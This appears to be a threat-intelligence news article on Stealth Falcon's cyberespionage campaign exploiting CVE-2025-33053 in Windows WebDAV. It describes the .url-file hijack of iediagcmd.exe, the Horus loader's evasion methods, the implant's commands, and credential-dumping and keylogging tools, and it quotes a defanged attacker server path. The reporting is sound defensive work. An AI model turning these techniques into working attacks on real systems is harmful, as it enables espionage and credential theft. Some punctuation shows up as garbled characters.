Stealth Falcon Exploits New Zero-Day (CVE-2025-33053) in Sophisticated Cyberespionage Campaign
Ddos 
A new cyberespionage campaign attributed to the notorious APT group Stealth Falcon has been uncovered by Check Point Research (CPR), highlighting the weaponization of a zero-day vulnerability (CVE-2025-33053) in Microsoft Windows WebDAV. The sophisticated attacks, focused primarily on defense entities in the Middle East and Africa, leveraged .url files, living-off-the-land binaries (LOLBins), and a custom-built Mythic agent dubbed Horus to stealthily infiltrate high-profile targets.
βThe attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server,β CPR revealed in their threat report.
The vulnerability, patched by Microsoft on June 10, 2025, allows remote code execution via manipulated working directories. By crafting a malicious .url file, the attackers exploited Windows’ execution flow to substitute legitimate system binaries with malware hosted on attacker-controlled WebDAV servers.
In one case, a file titled TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url was submitted by a Turkish defense company. The shortcut was crafted to execute iediagcmd.exeβa legitimate Windows diagnostic toolβbut redirected its working directory to a WebDAV server, causing it to run a malicious route.exe instead of the system binary.
βThe iediagcmd tool will run the route.exe executable the attackers placed in \summerartcamp[.]net@ssl@443β¦ instead of a legitimate one in system32,β CPR explained.
The attack chain is multi-staged and cleverly obfuscated. The initial .url file loads a C++ malware loader called Horus Loader, which employs:
- Code Virtualizer obfuscation
- Anti-debugging techniques
- Manual DLL mapping
- Decoy document execution
- Memory-resident payload injection
Horus Loader decrypts and displays a legitimate PDF while injecting a custom payloadβentirely composed of IP-fuscated IPv6 stringsβinto a suspended process (msedge.exe), effectively hiding the payload in network syntax.
βWhatβs revealed is a large list of IPv6 addressesβ¦ converted into the payload using thousands of calls to RtlIpv6StringToAddressA,β the researchers wrote.
Once executed, the Horus Agent, a highly customized C++ implant built on the Mythic C2 framework, takes over. It communicates with a C2 infrastructure using AES encryption, HMAC integrity checks, and base64 encoding, and supports stealthy commands like:
- survey β Fingerprint target machine
- shinjectchunked β Shellcode injection in stealth mode
- upload β Data exfiltration
- exit β Clean termination
The implant implements string obfuscation, API hashing, control flow flattening, and dummy Windows API imports to evade static analysis.
βThis is likely intended to confuse static analysis enginesβ¦ observed in previous Stealth Falcon backdoors,β Check Point stated.
The campaign also revealed a robust post-compromise toolkit, including:
- DC Credential Dumper: Extracts NTDS.dit, SAM, and SYSTEM files from virtual disks to bypass live OS locks.
- Passive Backdoor: A lightweight AES-encrypted listener embedded in a fake βUser Profile Service Check.β
- Custom Keylogger: Logs keystrokes to RC4-encrypted files in C:\Windows\Temp.
Check Point attributes the campaign to Stealth Falcon (a.k.a. FruityArmor) based on code similarities, infrastructure overlaps, and region-specific targeting. The APT group has a known history of espionage campaigns against:
- Government and military organizations
- Intelligence agencies
- Strategic technology companies
βStealth Falconβs activities are largely focused on the Middle East and Africa, with high-profile targets in the government and defense sectors observed in Turkey, Qatar, Egypt, and Yemen,β the report states.
The Horus Agent marks a significant evolution from Stealth Falconβs earlier implants like Apollo, a .NET-based Mythic agent. Unlike Apollo, Horus is rewritten in C++, offers more stealth, and combines multiple injection techniques into unified, configurable modules.
Related Posts:
- HORUS Protector: The New Undetectable Malware Crypter Threatening Cybersecurity
- CrowdStrike Falcon Sensor Crash Triggers Global IT Outage, Emergency Workaround Released
- Microsoft’s June 2025 Patch Tuesday: 2 Zero-Days, 69 Vulnerabilities Patched!
- CrowdStrike Reveals Technical Details of Update Causing Windows Systems Crash
- CrowdStrike Addresses High-Severity TLS Vulnerability in Falcon Sensor for Linux (CVE-2025-1146)
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
